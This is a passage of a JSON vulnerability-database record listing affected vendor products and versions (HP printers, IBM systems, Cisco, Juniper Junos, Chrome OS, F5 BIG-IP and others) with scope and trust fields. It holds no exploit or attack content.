r17ac.h", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.1" }, { "model": "color laserjet cp3525 cc470a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.122" }, { "model": "laserjet pro color printer m251n/nw cf146a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "20020140919" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "laserjet printer series q5401a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "42508.250.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.47" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.0.10" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power ps703 blade", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7891-73x)0" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "3.3.1" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.36" }, { "model": "system storage ts3400 tape library", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0039" }, { "model": "dynamic system analysis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.60" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.6" }, { "model": "s7700\u0026s9700 v200r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "flex system p460 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-43x)0" }, { "model": "update manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "1.0.6" }, { "model": "sterling connect:direct for microsoft windows", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.7" }, { "model": "openvpn", "scope": "ne", "trust": 0.3, "vendor": "openvpn", "version": "2.3.4" }, { "model": "junos 12.1x44-d32", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "splunk", "scope": "ne", "trust": 0.3, "vendor": "splunk", "version": "6.1.2" }, { "model": "freedome for android", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "0" }, { "model": "fortios b0630", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.8" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.00" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.60" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.4" }, { "model": "dsr-1000n 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project metasploit framework", "scope": "eq", "trust": 0.3, "vendor": "metasploit", "version": "4.1.0" }, { "model": "oncommand unified manager host package", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.1" }, { "model": "oceanstor s2200t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "web security", "scope": "eq", "trust": 0.3, "vendor": "websense", "version": "7.7" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "icewall sso dfw r1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "vdi-in-a-box", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.4.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.14" }, { "model": "security enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "spa232d multi-line dect ata", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "policy center v100r003c00spc305", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v19.7" }, { "model": "bladesystem c-class onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.11" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "flex system p270 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7954-24x)0" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "58200" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.52" }, { "model": "laserjet pro m401a/d/dn/dnw/dw/n cf285a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "40020150212" }, { "model": "crossbow", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "system x3650m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79471.42" }, { "model": "vdi-in-a-box", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.3.0" }, { "model": "system x3200m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "73281.42" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.16" }, { "model": "ios software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.39" }, { "model": "ios xe software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1" }, { "model": "color laserjet cm6040 multifunction printer q3939a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32400" }, { "model": "color laserjet cp6015 q3933a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.203.1" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "integrated management module ii", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.76" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "10.0-release-p5", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "laserjet m3027 multifunction printer cc479a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.1" }, { "model": "laserjet multifunction printer series q3942a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "43459.310.2" }, { "model": "crossbow", "scope": "ne", "trust": 0.3, "vendor": "siemens", "version": "4.2.3" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "9.2" }, { "model": "junos 10.4s14", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.25" }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413011.5" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "laserjet m4345 multifunction printer cb428a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "48.306.1" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.1" }, { "model": "anyconnect secure mobility client for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "uacos c4.4r11.1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "dsr-500n 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "color laserjet m651 cz255a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.1.16" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.8" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.11" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "storeever msl6480 tape library", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.40" }, { "model": "msr3000 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "video surveillance series ip camera", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.0" }, { "model": "color laserjet enterprise m750 d3l09a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos space 13.1r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.013" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.3" }, { "model": "laserjet enterprise color m855 a2w79a 2302963 436076", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "800" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.67" }, { "model": "filenet system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "spa510 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "operations automation", "scope": "eq", "trust": 0.3, "vendor": "parallels", "version": "5.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.20" }, { "model": "4800g switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "junos 12.1x44-d34", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "flex system p460", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-43x)0" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "4.3.7" }, { "model": "fortimail", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.4" }, { "model": "idp 4.1r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10" }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.00" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.5" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "usg9500 v200r001c01sph902", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.31" }, { "model": "laserjet enterprise m4555 mfp ce503a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.11" }, { "model": "sylpheed", "scope": "ne", "trust": 0.3, "vendor": "sylpheed", "version": "3.4.2" }, { "model": "host checker", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.3" }, { "model": "junos space ja2500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "enterprise linux server eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "9.0" }, { "model": "laserjet m5035 multifunction printer q7831a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.10" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "prime performance manager for sps", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "receiver", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "update manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "clustered data ontap antivirus connector", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "0.9.12" }, { "model": "secure work space", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "0" }, { "model": "color laserjet cp6015 q3935a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "53.236.1" }, { "model": "s7700\u0026s9700 v200r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "87100" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.2" }, { "model": "color laserjet cm4730 multifunction printer cb482a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.37" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "s3900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "collaboration services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "unified communications widgets click to call", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.16" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.49" }, { "model": "color laserjet cp6015 q3933a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "53.236.1" }, { "model": "softco v100r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.6" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.13" }, { "model": "telepresence t series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "idol software", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "10.7" }, { "model": "workstation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "9.0.3" }, { "model": "puredata system for hadoop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.02" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "1.0.3" }, { "model": "ftp server", "scope": "eq", "trust": 0.3, "vendor": "cerberus", "version": "7.0.0.1" }, { "model": "proventia network security controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "idatplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79130" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v310.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.169" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.1" }, { "model": "fastsetup", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.4" }, { "model": "flare experience for ipad", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.26" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32100" }, { "model": "laserjet printer series q5409a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "43508.250.2" }, { "model": "laserjet enterprise mfp m630 series b3g85a 2303714 233000041", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.2" }, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.0" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-3" }, { "model": "color laserjet multifunction printer series cb483a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "400046.380.3" }, { "model": "client applications", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "jabber for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dgs-1500-28p", "scope": "eq", "trust": 0.3, "vendor": "d link", "version": "2.51.005" }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.4" }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "junos 11.4r12", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "security network intrusion prevention system gx5208", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1.1" }, { "model": "a6600 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "xenclient enterprise", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "4.5.1" }, { "model": "netscaler", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "9.1" }, { "model": "laserjet multifunction printer series q3728a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9040/90508.290.2" }, { "model": "junos space 12.3r2.8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "system x3650m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79451.42" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.36" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "color laserjet cp6015 q3932a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.203.1" }, { "model": "operations analytics", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "bcaaa", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.9" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.2" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.3" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.4" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.213" }, { "model": "vsphere support assistant", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "manageone v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.7" }, { "model": "laserjet m4345 multifunction printer cb426a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "48.306.1" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "tivoli netcool/system service monitor fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.34" }, { "model": "s7700\u0026s9700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.19" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "s6900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "14.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.65" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.3" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.1" }, { "model": "ucs b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "0.7.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.16" }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.011" }, { "model": "junos r7", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.29" }, { "model": "storeever msl6480 tape library", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "junos os 11.4r12-s1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.2" }, { "model": "3par service processor sp-4.3.0.ga-17.p001", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "laserjet printer series q5407a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "43508.250.2" }, { "model": "laserjet enterprise color mfp m880 a2w76a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8000" }, { "model": "client applications", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.28" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "laserjet enterprise color m775 series cc524a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7000" }, { "model": "universal small cell series software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50003.4.2.0" }, { "model": "laserjet p4515 cb515a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "junos 12.1r9", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "junos 11.4r10-s1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "firepass", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.45" }, { "model": "junos 12.1x46-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "cit", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.41" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.116" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.73" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.67" }, { "model": "junos 12.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "vdi-in-a-box", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.3.1" }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.015" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9" }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.09" }, { "model": "sbr carrier 8.0.0-r2", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "documentum content server sp2", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.1.1" }, { "model": "malware 